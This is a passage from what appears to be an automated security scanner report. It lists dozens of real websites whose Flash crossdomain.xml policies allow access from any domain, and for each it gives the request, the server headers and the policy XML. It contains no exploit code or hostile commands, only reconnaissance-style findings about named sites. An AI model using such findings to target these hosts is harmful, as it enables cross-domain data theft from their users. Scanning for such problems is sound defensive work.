<allow-access-from domain="*"/>
</cros
...[SNIP]...

7.32. http://www.arkansasrazorbacks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arkansasrazorbacks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.arkansasrazorbacks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:57:50 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.33. http://www.ask-oracle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask-oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ask-oracle.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:12 GMT
Server: Apache
Last-Modified: Fri, 20 Nov 2009 08:24:17 GMT
ETag: "1a45e4f-ca-478c933a42e40"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.34. http://www.babepond.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babepond.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babepond.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:06 GMT
Server: Apache/2.2
Last-Modified: Wed, 27 Oct 2010 08:05:11 GMT
ETag: "29dca44-64-af387bc0"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.35. http://www.bahamas.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bahamas.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bahamas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:31:25 GMT
Server: Apache
Last-Modified: Thu, 19 Mar 2009 20:00:32 GMT
ETag: "7b4241-95-40a9d800"
Accept-Ranges: bytes
Content-Length: 149
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:31:25 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://www.bahmas.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.36. http://www.betterflashgames.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.betterflashgames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.betterflashgames.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 02:15:23 GMT
ETag: "8da001a-cc-49ef4b33a64c0"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.37. http://www.blastcasta.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blastcasta.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blastcasta.com

Response

HTTP/1.1 200 OK
Content-Length: 159
Content-Type: text/xml
Last-Modified: Sun, 23 Mar 2008 04:06:30 GMT
Accept-Ranges: bytes
ETag: "9f1713469b8cc81:b43"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:00:44 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.blastcasta.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.38. http://www.blick.ch/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blick.ch
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blick.ch

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 02 Apr 2008 12:28:11 GMT
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 03:00:33 GMT
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 199
X-Cacheable: YES
Date: Wed, 04 May 2011 02:56:28 GMT
Age: 56
Connection: close
X-Cache: HIT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.39. http://www.bloodytrailers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloodytrailers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bloodytrailers.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:03:53 GMT
Content-Type: text/xml
Content-Length: 278
Last-Modified: Thu, 03 Jun 2010 14:16:31 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-reque
...[SNIP]...

7.40. http://www.breederscup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.breederscup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.breederscup.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 04 Aug 2008 21:47:24 GMT
Accept-Ranges: bytes
ETag: "03ef5ad7bf6c81:29e"
Server: Microsoft-IIS/6.0
Farm: 233
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:49:24 GMT
Content-Length: 104
Connection: close
Via: 1.0 AN-0016020121270012

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.41. http://www.buitoni.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buitoni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buitoni.com

Response

HTTP/1.0 200 OK
Content-Length: 290
Content-Type: text/xml
Last-Modified: Tue, 12 Apr 2011 18:41:20 GMT
Accept-Ranges: bytes
ETag: "dfd5723741f9cb1:508f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Wed, 04 May 2011 01:16:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:16:27 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-d
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.42. http://www.canvaspeople.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.canvaspeople.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.canvaspeople.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 13 Jan 2011 20:43:42 GMT
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.43. http://www.cartoonnetworkasia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cartoonnetworkasia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cartoonnetworkasia.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=YUPQMPSPASSPORTWEB3140CKWII; path=/
Date: Wed, 04 May 2011 02:44:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 10 Jul 2009 11:13:38 GMT
ETag: "19b0bf6-c5-46e581063dc80"
Accept-Ranges: bytes
Content-Length: 197
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*" secure="false" />
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.44. http://www.cayenne.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cayenne.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cayenne.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:28:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 20 Jul 2010 17:35:01 GMT
ETag: "fe8d2d-148-48bd51ad05b40"
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 04:28:50 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.45. http://www.channel933.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.channel933.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.channel933.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188524289 3188360195
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:36:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:36:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.46. http://www.charlestoncvb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.charlestoncvb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.charlestoncvb.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:12:26 GMT
Server: none
Last-Modified: Tue, 16 Mar 2010 17:41:08 GMT
ETag: "2580031-f1-481ee80af1500"
Accept-Ranges: bytes
Content-Length: 241
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 01:12:26 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <allow-access-from domain="localhost"/>
...[SNIP]...

7.47. http://www.chiq.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chiq.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chiq.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/xml
Last-Modified: Mon, 28 Feb 2011 12:51:46 GMT
Content-Length: 94
Date: Wed, 04 May 2011 01:12:55 GMT
X-Varnish: 421583572
Age: 0
Via: 1.1 varnish
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

7.48. http://www.chnlove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chnlove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chnlove.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:29 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 02:41:22 GMT
ETag: "23498fd-c9-493b864d83880"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.49. http://www.chobani.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chobani.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chobani.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:51:07 GMT
Server: Apache/2.0.54
Last-Modified: Tue, 06 Apr 2010 22:23:21 GMT
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=216000, public, must-revalidate
Expires: Wed, 04 May 2011 01:51:08 GMT
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.50. http://www.cities97.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cities97.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cities97.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188068929 3187928509
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:23:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:23:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.51. http://www.clubbk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clubbk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clubbk.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 29 Apr 2011 14:19:19 GMT
Accept-Ranges: bytes
ETag: "db3bc6d786cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 332
Date: Wed, 04 May 2011 01:04:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.52. http://www.collegeotr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegeotr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegeotr.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 05 Dec 2009 20:43:00 GMT
ETag: "50e08-93-451e1d00"
Accept-Ranges: bytes
Content-Length: 147
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.53. http://www.corridorcareers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.corridorcareers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.corridorcareers.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 12 Jan 2009 15:53:02 GMT
Accept-Ranges: bytes
ETag: "b0c6d8d9cd74c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
ID: 50
Date: Wed, 04 May 2011 03:55:24 GMT
Connection: close
Content-Length: 269

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-re
...[SNIP]...

7.54. http://www.crabtree-evelyn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.crabtree-evelyn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.crabtree-evelyn.com

Response

HTTP/1.1 200 OK
Content-Length: 213
Content-Type: text/xml
Content-Location: http://www.crabtree-evelyn.com/crossdomain.xml
Last-Modified: Wed, 27 Apr 2011 14:55:15 GMT
Accept-Ranges: bytes
ETag: "804bc21deb4cc1:3be"
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 01:04:44 GMT
Connection: close
Set-Cookie: crabtree=698272266.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-d
...[SNIP]...

7.55. http://www.cubuffs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cubuffs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cubuffs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:22 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.56. http://www.cycling.tv/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cycling.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cycling.tv

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:48 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.57. http://www.cyclones.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cyclones.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cyclones.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:31 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.58. http://www.dctheatrescene.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dctheatrescene.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dctheatrescene.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:00 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
Set-Cookie: PHPSESSID=85d963fd6d522d43aa1680984b56fd65; path=/
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.59. http://www.deanzadrivein.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deanzadrivein.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deanzadrivein.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:08 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.5 FrontPage/5.0.2.2510 mod_ssl/2.8.28 OpenSSL/0.9.7a
Last-Modified: Wed, 26 Mar 2008 19:29:10 GMT
ETag: "689bb6-cd-47eaa406"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.60. http://www.details.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.details.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.details.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a
Last-Modified: Wed, 16 Mar 2011 15:14:25 GMT
ETag: "c3722-85-49e9b000fd640"-gzip
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Wed, 04 May 2011 03:26:40 GMT
Date: Wed, 04 May 2011 03:16:40 GMT
Content-Length: 133
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>


7.61. http://www.diamondshark.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diamondshark.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.diamondshark.com

Response

HTTP/1.1 200 OK
Content-Length: 237
Content-Type: text/xml
Last-Modified: Wed, 23 Jun 2010 21:50:20 GMT
Accept-Ranges: bytes
ETag: "0b610131e13cb1:10e2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:27 GMT
Connection: close

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

7.62. http://www.diesel.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diesel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.diesel.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 May 2010 13:37:06 GMT
ETag: "2cb0024-cb-b055e480"
Content-Type: text/xml
Date: Wed, 04 May 2011 03:47:31 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.63. http://www.do512.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
